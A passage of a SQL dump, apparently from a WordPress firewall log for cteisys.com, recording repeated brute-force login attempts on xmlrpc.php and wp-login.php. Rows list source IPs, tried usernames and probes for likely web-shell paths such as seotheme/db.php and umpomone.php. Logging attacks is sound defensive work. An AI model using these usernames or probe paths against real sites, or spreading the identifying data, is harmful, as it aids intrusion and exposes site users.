57,152,'PC67RfG0ospIFzXOZ3eMSTKV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664424569.8625,152,'Yp9KU3twiDqHLI1PCFdENeGA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.16',1386567184,'newd',0,1664424574.2868,152,'awdBjz9W2AsYvMONxifekrQo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664424578.0718,152,'J9i5eKdlNMAwsurPYCGZ1Lkx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.88.207',1386567887,'newd',0,1664424585.6865,152,'hxJL1Ev3Z4KOb5NSaIqAeX0P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('60.205.227.183',1020126135,'newd',0,1664424587.4379,152,'uFB2xerLlRvjYXJd35INM7zE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664424594.7505,152,'D35d24QxvFHsUL0ayekV6AMj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664424596.7842,152,'udPbxOk3UKcsMzmtTlpLajXI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.133',90545285,'newd',0,1664424745.7749,152,'Y6JCsyvK4RxVieP8gh0j3QmD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.89.196.13',2556019725,'',0,1664424756.1647,55,'ASeb3fqGWoi8PdJLHaVFtTQs','','19|0|0|0|cteisys.com/wp-content/themes/hestia/inc/core/class-core-hestia.php',0,19,0),('87.236.20.246',1475089654,'newd',0,1664424828.5067,152,'FSKPINx6XM31nma8dcrUgAzi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.49.253',3515691517,'nathaniel-lipka',0,1664424977.9925,51,'EdcRItgKseXbZyLo9qH0kB4f','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('125.227.127.195',2112061379,'newd',0,1664425175.7700,152,'W9wTOCRhc8S6gmotLa37uUfX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.174.93',148024925,'newd',0,1664425462.1492,152,'ngJrwe7hom4AaRWSX6cOCfIM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.149.229',2671875557,'newd',0,1664425548.4457,152,'RQNWsnIw306qFKyBSf87pEb2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.241.3.166',804324262,'newd',0,1664425694.8841,152,'aqghNm8xSWVFIwJlyO5Y7kCc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.144.53',3265499189,'newd',0,1664425694.9087,152,'uzaimD5ebOGQgKTtXUdFNqnk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.221.205.249',2094910969,'newd',0,1664425702.0232,152,'tx1ze3sYhoEdpZ7U5MFA2DiL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.8.12.105',1728580713,'newd',0,1664425704.1118,152,'emKGOBkNl6inrsh2VfSZxIup','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664425706.4979,152,'xpM6XWrjP7vwmz1U8T3b2yHB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.235.66.248',1844134648,'newd',0,1664425708.3876,152,'wDXsq2OoAY3uHF94feWIcxjR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.210.238',2717962990,'newd',0,1664425718.0258,152,'fk1w8tnUvoJNKmYbxM2ZcR65','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.74.82.165',1632260773,'newd',0,1664425724.0133,152,'UCPqkaphxKjJSbI015myOoWw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.200.23.120',1741166456,'newd',0,1664425724.4292,152,'UWauDJCjZ862mz4b9Sw1e7Rp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1664425885.4519,152,'bUEt81nqGPB6u4gw3AiCvcfx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.88.147',2707511443,'newd',0,1664426159.9984,152,'ExL52BFGUboVtYQ1daJ0KnTX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.187.74.213',532368085,'newd',0,1664426249.6637,152,'pvIQV7MHbLX63l0GPo4BEfAD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.21.138',2160530826,'newd',0,1664426480.5545,152,'608hfNskzXneLQjYVyJcB4gC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.87.216.226',844617954,'newd',0,1664426548.9967,152,'4873AkUb1Jcvts9Kg5IQ6MWr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.109.101.102',342713702,'newd',0,1664426818.3579,152,'jEobTeQ9IZy1FzUSksR0iu3B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'nathaniel-lipka',0,1664427074.2320,51,'htvEjF5kPK4DlmAYMu12ZXp7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.227.160.56',1088659512,'newd',0,1664427113.5111,152,'4hTitpZg2NjXqERWQ15kCVAz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.99.69.189',2338538941,'newd',0,1664427179.2222,152,'F8PTOYoKr5nR4U2kjuc3yGhZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.148.118.130',3482613378,'newd',0,1664427405.6189,152,'Y8DMxVibIjSuQtBOWXGCa2Az','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.36.82.134',908350086,'newd',0,1664427482.9211,152,'szTtb5BGlYJ7m62P9n3ugHXF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.247.254.32',2918710816,'newd',0,1664428387.3112,152,'n01gikI6qeJu2G3r8RUshT9d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.241',90545649,'newd',0,1664428643.4851,152,'nfOIV6cSMhBj4PW8mZtlGz90','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.245.215.122',3639990138,'newd',0,1664428688.8383,152,'hxA3GfU16pmbKseOEQ7l2aIq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.18.52.177',1997681841,'newd',0,1664428956.1017,152,'elsWnRBPdUjOmrNiI0wz6QEC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.45.251.157',1110309789,'newd',0,1664429003.7562,152,'wa5qJlOx47otIu1PEz68CVsr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.39',1386567207,'newd',0,1664429150.5511,152,'Gg73dFKowEuhNp2rJcfCl9vU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.239.161.138',351248778,'newd',0,1664429150.5633,152,'nBkJrLPs3Z2paIWzKDx6UAHb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664429156.6081,152,'zOn1WBoaLE69gfYUjNAvP53R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.126',3110826110,'newd',0,1664429158.1661,152,'efl2FbVkpZXm4rtdW7ASDu1K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.235.66.248',1844134648,'newd',0,1664429170.0153,152,'UtiHcq1OBh0su8PbfSGN5rWX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('133.18.25.1',2232555777,'newd',0,1664429176.1484,152,'dEs6fbgUkFT7jwaR25XhBISt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.252.248.52',771553332,'newd',0,1664429178.3976,152,'ZPTQzacmlMKE3e79oA0sgnRw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.98.64.188',1986150588,'newd',0,1664429552.0606,152,'WYTscxr02MOkv5UpSEyuA8ZI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.39.235',3496814571,'newd',0,1664429642.2667,152,'2CmwRMkzNioJEYPXcG4xVtgy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.222.68.53',1558070325,'newd',0,1664429874.4114,152,'vlKB6rcsQGg7Tq9WAVnfDFuP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.113.111.100',1567715172,'newd',0,1664430311.7905,152,'wiKfvp6Z1rDLAF5dWeksCjER','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.156',1046910108,'joyce',0,1664430514.8698,152,'GzWa4weDcKhSJ2CRxAqXvo3j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.161.80.219',1755402459,'newd',0,1664430958.7708,152,'HtxwkiMfjCI4WyaV7lbZOXJm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.182.4.117',783680629,'newd',0,1664431251.7246,152,'INSqAyzPsHTice4dFknu2wpW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'newd',0,1664431354.1412,152,'5gjc2PDVtmC3EM9fwqvdslRH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('133.18.25.1',2232555777,'newd',0,1664431355.2884,152,'RiucyxkSGTVMKIfYQv6XCtw3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664431358.2356,152,'Mg3ulove7wadjRYBftpriVWU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664431367.1873,152,'Q5egyZ8lKAaGYVjsbIzw60To','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664431370.5944,152,'BhpgOQSTMsy5YJ6nt2eciEAk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.205.144',1109511568,'newd',0,1664431381.8082,152,'vxBROyztlw5WSNYHkDAaLpnb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.127.106.229',2155834085,'newd',0,1664431388.3066,152,'4bdvDil0Te1mrnZPLAowJN5X','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.197.48.10',2596614154,'newd',0,1664431388.8631,152,'DJscPnuebH5RVBSzTq3aIOWC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664431396.5007,152,'HKtMRDgv2O3sGk9xX61lnzbL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.73.177',3270068657,'newd',0,1664431405.4449,152,'RafDqyuoHZdNMe5C2LFYtkQ4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664431407.2153,152,'YWjFz3ln1JagyCcstHeZ8kMS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.87.239.76',3512201036,'newd',0,1664431599.8461,152,'PRoEfSQcBb1pt6uYAheOmVDk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.35.64.73',1730363465,'newd',0,1664431696.6846,152,'xla5ArLvHKRYkghuCm6Qn1pw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('140.143.188.163',2358230179,'newd',0,1664431958.1532,152,'VSGZ9fdD1FKrWeMC6ymcplou','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.153.68.244',1738097908,'newd',0,1664432043.5893,152,'qQu9cdMaf7PzkleEvD4xCTJA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.244.254',2487809278,'newd',0,1664432313.5580,152,'Fa7qExGheWwYTsPnKfLyXrQ9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.247.212',1807022036,'newd',0,1664432417.0320,152,'xkgHRujqapCU9DnAZiOWYdyI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.55.206',3515693006,'newd',0,1664432906.3234,7,'6hIOiz8eH7P2rBZulq5swotM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('42.200.109.156',717778332,'newd',0,1664433107.8290,152,'shjbDgZxRHitV8wXcdPYov96','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('2.184.67.138',45630346,'newd',0,1664433195.9658,152,'DbX2PTNIYvOuF1s4ZCGMlqjn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.121.5',3098048773,'newd',0,1664433470.0421,152,'XbRlKINg9P4pWjCAOfr3hLJv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.63.13.50',759106866,'newd',0,1664433553.7916,152,'89GyNc6kYLKbph12U0TntAx7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.140.71.65',2777433921,'newd',0,1664433710.2959,152,'z2SKsZgAUPO8RkvdEf3iMmuT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664433717.7553,152,'fVEqs5OjnM2QTteRN7ZPlFm9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.58.73.254',3107604990,'newd',0,1664433722.0159,152,'nPmK7Hyqt1JxeDrjcl4XLfsz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664433726.9549,152,'qw4b0P1JuGh5DkTFRazgvjXH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.205.144',1109511568,'newd',0,1664433746.0446,152,'ezWUc9QE3i8jZYIodvAxkB4V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664433749.2328,152,'yXqJ1cER3MhYZ0nz7FDWeOA6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.197.48.10',2596614154,'newd',0,1664433749.2959,152,'raRzDnctx6G93T7IW2Ldi1jy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.178.120.231',3283253479,'',0,1664433766.2704,55,'FX3Aa5jp2gkUWHyVqO61wczY','','19|0|0|0|cteisys.com/wp-includes/class-index-wordpress.php',0,19,0),('203.156.136.113',3416033393,'newd',0,1664433772.5045,152,'upQPf2g8NzhS3Cymql4GnTHc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.178.120.231',3283253479,'',0,1664433815.5085,55,'QWnTiq6wu0zONgAhZtGjDPKv','','19|0|0|0|cteisys.com/wp-includes/class-wordpress-license.php',0,19,0),('195.178.120.231',3283253479,'',0,1664433898.5456,55,'OyMxWmnAlcRpLuEfIJtSosUZ','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('195.178.120.231',3283253479,'',0,1664433953.2627,55,'ktZrOB9iwuU2XNLs6ldaEWSc','','19|0|0|0|cteisys.com/wp-includes/pomo/umpomone.php',0,19,0),('81.196.171.130',1371843458,'newd',0,1664434264.8026,152,'j4QxmgD6IYnEFRVOt8kZKeoP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.149.241.246',3029725686,'newd',0,1664434653.8580,152,'68z34H1hMrDcRObJqBUNks5i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.195.133.73',1992525129,'newd',0,1664434697.0225,152,'OaoM0zZpmTtxcPeHv16XbdWq','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('118.195.133.73',1992525129,'newd',0,1664434698.4474,152,'9rcuydUeEMTL3wj2GSso6Zpv','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('118.195.133.73',1992525129,'newd',0,1664434699.5042,152,'qcAHD2Nsebku5xCPRymBGZw1','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('118.195.133.73',1992525129,'newd',0,1664434702.5320,152,'mslizg4C5AvbyjLBMaqfuFO1','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('118.195.133.73',1992525129,'newd',0,1664434703.5833,152,'GbZ8nReQcXpqEKxiOyjzNsYL','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('118.195.133.73',1992525129,'',0,1664434703.5878,10,'GbZ8nReQcXpqEKxiOyjzNsYL','','701|0|0|0|www.cteisys.com/xmlrpc.php',0,701,0),('118.195.133.73',1992525129,'',0,1664434704.5041,71,'wdMf7YCzB5hyuUqPQ6Z43ixg','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664434705.8177,71,'LKkfAEY9TSQ0cNewy2t3gPFa','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664434707.6716,71,'6MSRWezJIZt87QX3LCYUnwTy','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664434709.4675,71,'haweY5oQAULEcx8MHyRkG1l3','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664434710.4757,71,'2iS3KcIGtzAJsrEjXwMYbO4H','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664434711.3811,71,'fy0PCNDkzn4iedUlQGwa8R7B','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664434712.2747,71,'6YmgF5RQs9hHwtlcMXEJoGrb','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664434713.2541,71,'MOjAG3qfKc0pBLVX86ZoYF4k','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664434716.2655,71,'mp3Q18F05eZrS9uEhi7yBxNG','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664434720.3184,71,'QhF1tukGOH6xJiDaeL2RybBd','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664434721.5769,71,'2jYzx0Tdb89aX6Sc3FPJpGL4','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664434721.5774,18,'2jYzx0Tdb89aX6Sc3FPJpGL4','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('165.22.89.6',2769705222,'newd',0,1664434725.7256,152,'SWKTrJscGnXqIiQNORALFy1t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.98.102.235',2372036331,'joyce',0,1664434779.9376,152,'f6P3rkXdiJ2lWbK8C0eFUqRc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.197.48.10',2596614154,'newd',0,1664434843.0889,152,'hAgvl0xcIzeo7RSrPmKYQ9Va','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.205.144',1109511568,'newd',0,1664434844.2237,152,'ugqj8a3TSt4PEDcBQKzC9GvY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.106.142',1496214158,'newd',0,1664434844.3597,152,'vPVBepqaixJsdNZmhK0DC4Yj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.163.138.21',1738770965,'newd',0,1664434849.5480,152,'1iO3ZuBdAPafkYpX5g8ycjbV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.36.53',2388468789,'newd',0,1664434877.9573,152,'JUBlDICa2spV9ycAHv8FnGWM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.20',1364734996,'newd',0,1664434877.9584,152,'MINj9qxBp71OrlKuvst5C84Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('160.16.210.199',2685457095,'newd',0,1664434877.9605,152,'6DTo9lUu3t7LzwI2HcgSjbZa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664434892.9081,152,'aqD9hRe72nVTyNcP3wH1KsUC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.223.120.85',1390377045,'newd',0,1664434893.5685,152,'gG73CjIr9DmKLAoNHanYwpTS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.202.117.198',1959425478,'newd',0,1664434896.0465,152,'1azGWTZvHR4MEjq3dODKhQu5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.8.12.105',1728580713,'newd',0,1664434901.9381,152,'5ZIhfEeXlFDGJMVkB83W0Apo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.99.56.116',3227727988,'newd',0,1664435138.5408,152,'HGcfPwganuLE0MRdjkXA9tBS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.156.168',3265502376,'newd',0,1664435465.1598,152,'ljgYJ4DtPSbT8wh2eiRHAVyu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.249.223.130',3355041666,'joyce',0,1664435518.4528,152,'wjE8vVFa6NDqIy29YK03nhgx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.31.21.26',2065634586,'newd',0,1664435524.6851,152,'mb2j8NDfBOVyuqdtkoWP1UZv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.69.10',3270067466,'newd',0,1664435857.8153,152,'B5KGbEP41zouerFMWqY38vfR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.79.8.125',2018445437,'newd',0,1664435938.5925,152,'w93PXHRC1EvWUAYGjFOQSItJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.225.53.24',736179480,'newd',0,1664436292.5910,152,'ezhxA4VvmKY9PuyGbCpaZgO7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.129.178.69',1736553029,'newd',0,1664436692.7795,152,'ze7nd4OUPpWIKD6N21oBJFc5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.148.118.130',3482613378,'newd',0,1664436781.0319,152,'xtLj7oCBSd820NQERZl1m5ik','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.117.143',3451483535,'Joyce',0,1664437169.6604,51,'TcNSrt1ylYQULnV8K6jFahbJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('216.250.116.85',3640292437,'newd',0,1664437204.1840,152,'cdHxr8o6aSmB1EA5XVN4yjZv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.248.153.52',1475909940,'newd',0,1664437587.0883,152,'zFoTk4rqiL3VIgOG1clXYv9C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.88.147',2707511443,'newd',0,1664437656.0051,152,'JDxmCPAlvqgpucEXBsnHfy6I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.145.68.131',3197191299,'newd',0,1664438008.9671,152,'jaLiD06udytGFs3JNB2KpXTE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.241',90545649,'newd',0,1664438097.4821,152,'JbXenI6PrlhjS5mATiYH0M2G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664438220.8943,152,'Cj6q3VbYvUrPuaB75Gnf0K2A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.147.151',2160563095,'newd',0,1664438221.6266,152,'SrCR2M6ZzQ8d9JwVAT4evNOG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664438233.3543,152,'8nIyudAM7Bar1Ct4WFT65PEN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.8.12.105',1728580713,'newd',0,1664438242.3991,152,'FEalctjuBHiWDOZm1LwCx9rP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664438245.9096,152,'7H8Ll9MxzYUuJtc4iIFESqgn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.195.133.73',1992525129,'newd',0,1664438326.1545,152,'OTx46wknJzBbHhUIsPr7Nqo9','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('118.195.133.73',1992525129,'newd',0,1664438332.5029,152,'Fdngib9Jxrf0Rh4GAzuWY1Lq','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('118.195.133.73',1992525129,'newd',0,1664438333.6683,152,'WcgZRkF3qPdxonSi0eBOV2Mf','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('118.195.133.73',1992525129,'newd',0,1664438334.9603,152,'s5E8iIwS4VW2LnAoqDjYC1rH','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('118.195.133.73',1992525129,'newd',0,1664438336.0608,152,'IkQL263Uezu8tKjVqAMD5vOf','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('118.195.133.73',1992525129,'',0,1664438336.0644,10,'IkQL263Uezu8tKjVqAMD5vOf','','701|0|0|0|www.cteisys.com/xmlrpc.php',0,701,0),('118.195.133.73',1992525129,'',0,1664438337.7581,71,'Dp6Us3v9Fq1wJGl2ec4AyMTu','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664438338.7664,71,'NXv75M93JHYl2nomzSbyWThL','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664438339.7200,71,'8IODmd2jK4JEGMNzcvfw0rhk','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664438340.4922,71,'mnH4WCvUa7VqczXg2wQbKTEA','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664438341.3001,71,'83hSOlNxI9vWBjbT41f0kgHw','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664438342.4847,71,'2Fw4p1gTRZuQ65EozWxdsBAV','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664438343.3074,71,'UxG4aRivfdZzW5BojTJqsObN','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664438345.2505,71,'2EykdZnraNR1Qt9gvBMLw3Po','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664438346.1310,71,'wtUW5gfO1bhpcmZHG03qrBzD','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664438347.1051,71,'Y0AjcTUdJmxwgsH3oB5S2q6i','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664438348.1002,71,'ZpRjsPr5eV6YBcTxgMlD7Etq','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('118.195.133.73',1992525129,'',0,1664438348.1007,18,'ZpRjsPr5eV6YBcTxgMlD7Etq','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('213.187.11.137',3585805193,'admin',0,1664438879.5377,152,'OraYIQXFebu68AqWj0pNnB9P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.52.160.32',2973016096,'admin',0,1664438991.5383,152,'O7PfI5FaCvo4BrdeWSj6UXEl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.83.147.15',3562246927,'',0,1664439213.4954,55,'cqDA6rdltYwTCXSJ7NhU0kBP','','19|0|0|0|cteisys.com/wp-content/wp-file-conficg.php',0,19,0),('212.83.147.15',3562246927,'',0,1664439288.2877,55,'YFdeBQg0qKW3J4MhE1RlnaPV','','19|0|0|0|cteisys.com/wp-content/wp-files-conficg.php',0,19,0),('212.83.147.15',3562246927,'',0,1664439353.1045,55,'neD3aFTR0pobjdNOZSvcVBkz','','19|0|0|0|cteisys.com/wp-content/wordpress-index-keyword.php',0,19,0),('209.141.48.210',3515691218,'newd',0,1664439356.0507,7,'A8Iga2zpvjCT3fSi4oYq7h6H','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.59.110',2650094446,'newd',0,1664439418.8110,152,'aE4MG2tOZP5sR7LT9zoWfDlj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.163.195.60',3231957820,'newd',0,1664439782.8044,152,'8PEKQrf4CjTFy93huqZxYSlv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1664439881.5050,152,'T8iazOsFdQXprhc0fI3t2CjK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.183.216.163',783800483,'joyce',0,1664440319.0955,152,'Mt7kxSwEzsvLuUTDlbIXn8pJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.184.141',2806495373,'newd',0,1664440382.5815,152,'XKVN5jlcCbhdpWTQfrgIH9ty','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.153.25.22',731453718,'newd',0,1664440384.1487,152,'SEyoIP1iR7k0Z6HjhfNtp53Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.113.101',3110826341,'newd',0,1664440391.7248,152,'BjgXmzJyPVZi9sIEMQ6KpfNL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.197.48.10',2596614154,'newd',0,1664440397.7159,152,'ocFm5alCdZuQEgPK7139TiSN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664440399.3493,152,'jlRn45ds1BbKzuQvat8GiSCw','','0|0|0|0|cteisys.com/xmlrpc.php',